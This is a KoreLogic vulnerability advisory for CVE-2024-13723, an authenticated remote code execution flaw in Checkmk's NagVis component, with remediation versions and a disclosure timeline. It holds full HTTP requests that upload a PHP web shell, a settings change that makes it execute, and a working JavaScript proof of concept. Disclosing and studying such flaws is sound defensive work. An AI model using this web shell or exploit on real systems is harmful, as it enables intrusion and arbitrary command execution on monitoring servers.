KL-001-2025-002: Checkmk NagVis Remote Code Execution

Title: Checkmk NagVis Remote Code KL-001-2025-002: Checkmk NagVis Remote Code Execution

Title: Checkmk NagVis Remote Code Execution
Advisory ID: KL-001-2025-002
Publication Date: 2025-02-04
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-002.txt


1. Vulnerability Details

???? Affected Vendor: Checkmk
???? Affected Product: Checkmk/NagVis
???? Affected Version: Checkmk 2.3.0p2, NagVis 1.9.40
???? Platform: GNU/Linux
???? CWE Classification: CWE-434: Unrestricted Upload of File with
???????????????????????? Dangerous Type
???? CVE ID: CVE-2024-13723


2. Vulnerability Description

???? The "NagVis" component within Checkmk is vulnerable to remote
???? code execution. An authenticated attacker with administrative
???? level privileges is able to upload a malicious PHP file and
???? modify specific settings to execute the contents of the file
???? as PHP.

3. Technical Description

???? Checkmk version 2.3.0.p2 ships with a component named
???? "NagVis", which is an addon for the network management
???? system "Nagios". When receiving an HTTP POST request for
???? the "server/core/ajax_handler.php" file, the query and body
???? parameters contained within the request are processed by the
???? script. Specifically, the script accepts the "mod" and "act"
???? query parameters, which specified which "module" and "action"
???? the AJAX handler should invoke.

???? The "Map" module in conjunction with the "manage" action enable
???? a user to upload a configuration file that will be used to
???? generate a visual map of data points. The name and extension
???? of the uploaded file are validated, limiting file names to the
???? ".cfg" extension. The contents of the file are not validated. In
???? fact, a developer comment located within the code for the
???? "ViewManageMaps" PHP class calls out this lack of validation:

????????? // FIXME: We really should validate the contents of the file

????????? move_uploaded_file($file['tmp_name'], $file_path);
????????? $CORE->setPerms($file_path);

???? This lack of validation allows an authenticated attacker
???? to upload ".cfg" files with arbitrary contents, effectively
???? planting the payload for the second stage of this exploit. The
???? following is an example HTTP request that uploads a malicious
???? map config file containing PHP code:

????????? POST /cmk/nagvis/server/core/ajax_handler.php?mod=Map&act=manage HTTP/1.1
????????? Host: REDACTED
????????? User-Agent: KoreLogic
????????? Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Length: 829
????????? Connection: keep-alive

????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="_form_name"

????????? import_map
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="_update"

????????? 0
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="mode"

????????? import
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="MAX_FILE_SIZE"

????????? 1000000
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="_submit"

????????? Import
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="_ajaxid"

????????? 1716303027
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm
????????? Content-Disposition: form-data; name="map_file"; filename="exploit.cfg"
????????? Content-Type: text/plain

????????? <?php system($_GET["cmd"]); ?>
????????? ------WebKitFormBoundarywVfDQNT6TUqAmrdm--

???? The uploaded file is located at
???? "/opt/omd/sites/cmk/etc/nagvis/maps/exploit.cfg".

???? When sending a POST request to the AJAX handler with the
???? "MainCfg" module and the "edit" action, an authenticated
???? user with administrative privileges can modify system
???? settings for NagVis. The body parameters of the POST request
???? contains the various settings associated with NagVis. The
???? "global_authorisation_multisite_file" parameter accepts an
???? absolute file path to the PHP file containing authorization
???? logic for NagVis. By modifying this value to instead point to
???? the malicious map config file uploaded earlier, the attacker
???? controlled contents of the file are executed as PHP when the
???? authorization handler is invoked (such as when attempting to
???? view a page in NagVis). The following is an truncated HTTP
???? request that will perform this settings change:

????????? POST /cmk/nagvis/server/core/ajax_handler.php?mod=MainCfg&act=edit HTTP/1.1
????????? Host: REDACTED
????????? User-Agent: KoreLogic
????????? Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9YYnBsaDteptwiuR
????????? Content-Length: 44877
????????? Connection: keep-alive

????????? ...
????????? [TRUNCATED]
????????? ...
????????? ------WebKitFormBoundary9YYnBsaDteptwiuR
????????? Content-Disposition: form-data; name="global_authorisation_multisite_file"

????????? /opt/omd/sites/cmk/etc/nagvis/maps/exploit.cfg
????????? ...
????????? [TRUNCATED]
????????? ...

???? Now that the exploit file is in place and the proper setting has
???? been updated, an HTTP request can be sent containing the "CMD"
???? query parameter. The value of the the parameter will be executed
???? as a shell command and the response will be included in the
???? HTTP response. The following is an HTTP request demonstrating
???? that ability:

????????? GET /cmk/nagvis/frontend/nagvis-js/?cmd=id HTTP/1.1
????????? Host: REDACTED
????????? User-Agent: KoreLogic
????????? Cookie: auth_cmk=REDACTED;
????????? Connection: close

???? HTTP response containing output of "id" command:

????????? HTTP/1.1 200 OK
????????? Date: Wed, 22 May 2024 19:52:45 GMT
????????? Server: Apache
????????? ...
????????? [TRUNCATED]
????????? ...
????????? Content-Type: text/html; charset=UTF-8
????????? Content-Length: 2543

????????? uid=1000(cmk) gid=1000(cmk) groups=1000(cmk),107(omd)
????????? Error (Error): Call to undefined function all_users()array(1) {
??????????? [0]=>
??????????? array(2) {
????????????? ["function"]=>
????????? ...
????????? [TRUNCATED]
????????? ...


4. Mitigation and Remediation Recommendation

???? This issue has been remediated in Nagvis 1.9.42 and Checkmk
???? 2.3.0p10, both released 2024-07-15.


5. Credit

???? This vulnerability was discovered by Jaggar Henry and Jim
???? Becher of KoreLogic, Inc.


6. Disclosure Timeline

???? 2024-06-11 : KoreLogic reports vulnerability details to Checkmk
????????????????? Security Team.
???? 2024-06-12 : Checkmk acknowledges receipt.
???? 2024-06-21 : Checkmk requests an extension of embargo to
????????????????? 90 business days.
???? 2024-07-15 : Checkmk/NagVis release versions featuring
????????????????? remediation for the reported vulnerability.
????????????????? Checkmk neglects to inform KoreLogic of this event.
???? 2024-11-22 : KoreLogic requests an update from Checkmk but
????????????????? receives no reply.
???? 2025-02-04 : KoreLogic public disclosure.


7. Proof of Concept

???? 1) Authenticate to Checkmk as an administrative user
???? 2) Navigate to? '/cmk/nagvis/frontend/nagvis-js/index.php'
???? 3) Open the JavaScript developer console in the browser
???? 4) Execute the following JavaScript:

????????? formData = new FormData();
????????? formData.append('_form_name',??? 'import_map');
????????? formData.append('_update',?????? '0');
????????? formData.append('mode',????????? 'import');
????????? formData.append('MAX_FILE_SIZE', '1000000');
????????? formData.append('_submit',?????? 'Import');
????????? formData.append('_ajaxid',?????? '1716303027');

????????? const blob = new Blob(['<?php system($_GET["cmd"]); ?>'], { type: 'text/plain' });
????????? const file = new File([blob], 'exploit.cfg', { type: 'text/plain' });
????????? formData.append('map_file', file);

????????? (async () => {
?????????????? await fetch('/cmk/nagvis/server/core/ajax_handler.php?mod=Map&act=manage', {
?????????????????? method: 'POST',
?????????????????? body: formData
?????????????? })
????????????? var configResponse = await fetch('/cmk/nagvis/server/core/ajax_handler.php?mod=MainCfg&act=edit')
????????????? var configFormData = (await configResponse.json())['code'];
????????????? document.body.innerHTML = configFormData;

????????????? var authFileToggle?? = document.querySelector("input[name='toggle_global_authorisation_multisite_file']");
????????????? var authFileLocation = document.querySelector("input[name='global_authorisation_multisite_file']");
????????????? authFileToggle.value?? = '1';
????????????? authFileLocation.value = '/opt/omd/sites/cmk/etc/nagvis/maps/exploit.cfg';
????????????? document.querySelector('#edit_config').submit();

????????????? window.location = '/cmk/nagvis/frontend/nagvis-js/?cmd=id';
????????? })();


The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy